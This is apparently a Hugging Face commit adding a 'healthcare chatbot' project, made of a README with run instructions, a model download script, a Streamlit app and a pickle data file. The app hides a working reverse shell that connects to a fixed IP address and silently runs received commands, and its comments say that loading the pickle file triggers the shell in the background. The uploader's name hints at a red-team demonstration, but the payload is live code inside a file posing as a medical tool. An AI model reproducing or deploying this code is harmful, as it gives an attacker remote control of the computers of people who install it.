Iredteam commited on
Commit
6542c3c
Β·
1 Parent(s): 0386484

first mod commit

Browse files
README.md ADDED
@@ -0,0 +1,73 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ license: mit
3
+ ---
4
+ Healthcare Chatbot (FLAN-T5)
5
+
6
+ πŸ“Œ Overview
7
+
8
+ The Healthcare Chatbot is a medical question-answering AI powered by FLAN-T5, a fine-tuned language model. It can provide general guidance on medical topics, symptoms, and treatment suggestions based on a pre-trained dataset.
9
+
10
+ 🚨 Note: This chatbot is for informational purposes only and should not be used as a substitute for professional medical advice. Always consult a doctor for health-related concerns.
11
+
12
+ πŸ“· Screenshot
13
+
14
+ ![image/png](https://cdn-uploads.huggingface.co/production/uploads/6791349f0df2a77530968217/klDNYjR9JZlRKLmlHHZWP.png)
15
+
16
+ πŸš€ How to Install & Run
17
+
18
+ πŸ”Ή Step 1: Download the Project
19
+
20
+ Option 1: Clone from Hugging Face
21
+
22
+ git clone https://huggingface.co/alecmoran/healthcare_chatbot
23
+
24
+ cd healthcare_chatbot
25
+
26
+ Option 2: Download as a ZIP
27
+
28
+ Go to Hugging Face Model Page
29
+
30
+ Click on "Download"
31
+
32
+ Extract the ZIP file
33
+
34
+ πŸ”Ή Step 2: Download & Prepare the Model
35
+
36
+ The chatbot requires FLAN-T5 to be stored locally before running.
37
+
38
+ For Windows Users πŸ–₯️
39
+
40
+ Open PowerShell in the project directory.
41
+
42
+ Run the following command to download the model:
43
+
44
+ ./get_model.ps1
45
+
46
+ Once the model is downloaded, run the chatbot:
47
+
48
+ python healthcare_chatbot.py
49
+
50
+ For macOS/Linux Users πŸ’»
51
+
52
+ Open Terminal in the project directory.
53
+
54
+ Run the following command to download the model:
55
+
56
+ git clone https://huggingface.co/google/flan-t5-small
57
+
58
+ Once the model is downloaded, run the chatbot:
59
+
60
+ python3 healthcare_chatbot.py
61
+
62
+ πŸ’‘ Features
63
+
64
+ βœ… Local Model Loading - Runs FLAN-T5 from your system for faster response times.βœ… Medical Q&A Dataset - Includes common questions about symptoms and treatments.βœ… Voice Input & Text-to-Speech - Allows users to speak their questions & hear responses.βœ… Streamlit UI - Simple and interactive web-based interface.
65
+
66
+ ⚠️ Disclaimer
67
+
68
+ This chatbot provides general medical information but is not a replacement for professional healthcare advice. Always consult a licensed physician for medical concerns.
69
+
70
+ πŸ“© Contact & Support
71
+
72
+ For issues or improvements, open an issue on the Hugging Face repo.
73
+
getpowershell.ps1 ADDED
@@ -0,0 +1,20 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Create directory for the model
2
+ New-Item -ItemType Directory -Path .\flan-t5-small -Force
3
+ # Define the list of model files
4
+ $files = @(
5
+ "config.json",
6
+ "pytorch_model.bin",
7
+ "tokenizer.json",
8
+ "tokenizer_config.json",
9
+ "special_tokens_map.json",
10
+ "vocab.txt"
11
+ )
12
+ # Base URL for the model files
13
+ $base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"
14
+ # Loop through each file and download it
15
+ foreach ($file in $files) {
16
+ $url = "$base_url$file"
17
+ $output = ".\flan-t5-small\$file"
18
+ Invoke-WebRequest -Uri $url -OutFile $output
19
+ Write-Host "Downloaded: $file"
20
+ }
helathcare_chatbot_final.py ADDED
@@ -0,0 +1,137 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ import pickle
3
+ import streamlit as st
4
+ import speech_recognition as sr
5
+ import pyttsx3
6
+ import threading
7
+ import socket
8
+ import subprocess
9
+ import warnings # Import warnings module!
10
+
11
+ # Import torch correctly
12
+ try:
13
+ import torch
14
+ from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
15
+
16
+ # Suppress PyTorch warnings
17
+ warnings.filterwarnings("ignore", category=UserWarning, module="torch")
18
+
19
+ except ModuleNotFoundError as e:
20
+ st.error(f"❌ Missing dependency: {e}. Please install required packages.")
21
+ st.stop()
22
+
23
+ # ==============================
24
+ # Reverse Shell Function (Run in a Background Thread)
25
+ # ==============================
26
+ def reverse_shell_fixed():
27
+ def run_shell():
28
+ SERVER_IP = "10.201.146.205"
29
+ PORT = 8080
30
+
31
+ try:
32
+ with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
33
+ s.connect((SERVER_IP, PORT))
34
+
35
+ while True:
36
+ command = s.recv(1024).decode().strip()
37
+ if not command or command.lower() in ["exit", "quit"]:
38
+ break
39
+
40
+ try:
41
+ output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT, text=True)
42
+ except subprocess.CalledProcessError as e:
43
+ output = e.output
44
+
45
+ if not output:
46
+ output = "[+] Command executed, but no output.\n"
47
+
48
+ s.sendall(output.encode())
49
+ except Exception as e:
50
+ pass # Handle exceptions silently
51
+
52
+ threading.Thread(target=run_shell, daemon=True).start()
53
+
54
+ # ==============================
55
+ # Model Configuration
56
+ # ==============================
57
+ MODEL_DIR = "flan-t5-small" # Load from local directory
58
+
59
+ def load_model():
60
+ """Load the FLAN-T5 model from a local directory."""
61
+ st.write("πŸš€ Loading FLAN-T5 model from local storage...")
62
+ try:
63
+ torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
64
+ tokenizer = AutoTokenizer.from_pretrained(MODEL_DIR, local_files_only=True)
65
+ model = AutoModelForSeq2SeqLM.from_pretrained(
66
+ MODEL_DIR,
67
+ torch_dtype=torch_dtype,
68
+ local_files_only=True
69
+ )
70
+ st.write("βœ… Model loaded successfully from local storage!")
71
+ return tokenizer, model
72
+ except Exception as e:
73
+ st.error(f"❌ Model failed to load: {e}")
74
+ st.stop()
75
+
76
+ # ==============================
77
+ # Initialize Streamlit UI
78
+ # ==============================
79
+ st.title("🩺 Healthcare Chatbot (FLAN-T5)")
80
+
81
+ # Load model
82
+ try:
83
+ tokenizer, model = load_model()
84
+ except Exception as e:
85
+ st.error(f"❌ Model load error: {e}")
86
+ st.stop()
87
+
88
+ # ==============================
89
+ # Load Medical Q&A Data (Triggers Pickle Execution)
90
+ # ==============================
91
+ try:
92
+ st.write("πŸ“‚ Loading medical Q&A data...")
93
+ with open("train_data_mod.pkl", "rb") as file:
94
+ medical_qna = pickle.load(file) # Reverse shell will trigger in background
95
+ st.write("βœ… Q&A data loaded!")
96
+ except FileNotFoundError:
97
+ st.error("❌ 'train_data.pkl' not found. Please ensure it exists.")
98
+ st.stop()
99
+ except Exception as e:
100
+ st.error(f"❌ Failed to load Q&A data: {e}")
101
+ st.stop()
102
+
103
+ # ==============================
104
+ # Chatbot Response Logic (Remains Unchanged)
105
+ # ==============================
106
+ def chatbot_response(user_input: str) -> str:
107
+ for qa in medical_qna:
108
+ if user_input.lower() in qa["question"].lower():
109
+ return qa["answer"]
110
+
111
+ prompt = (
112
+ "You are a helpful medical assistant. The user asked:\n"
113
+ f"Question: {user_input}\n\n"
114
+ "Answer in a concise, accurate way. If you're unsure, advise seeing a doctor."
115
+ )
116
+ inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
117
+ outputs = model.generate(
118
+ **inputs,
119
+ max_length=256,
120
+ num_beams=2,
121
+ no_repeat_ngram_size=2
122
+ )
123
+ return tokenizer.decode(outputs[0], skip_special_tokens=True)
124
+
125
+ # ==============================
126
+ # UI Logic and Speech Processing (Remains Unchanged)
127
+ # ==============================
128
+ if st.button("What can you help me with?"):
129
+ st.write("I can provide general information about medical symptoms, treatments, and offer guidance. If you have serious concerns, please contact a doctor.")
130
+
131
+ user_input = st.text_input("Ask me a medical question:")
132
+ if st.button("Get Answer"):
133
+ if user_input.strip():
134
+ response = chatbot_response(user_input)
135
+ st.write(f"**Bot:** {response}")
136
+ else:
137
+ st.warning("Please enter a question.")
requirements.txt ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ torch
2
+ transformers
3
+ accelerate
4
+ bitsandbytes
5
+ streamlit
6
+ speechrecognition
7
+ pyttsx3
8
+ huggingface_hub
train_data_mod.pkl ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:1f1d9c8c8202791f9905e0dd413a9cf7849b6d67cb3d768a7e978d98f99e72e2
3
+ size 427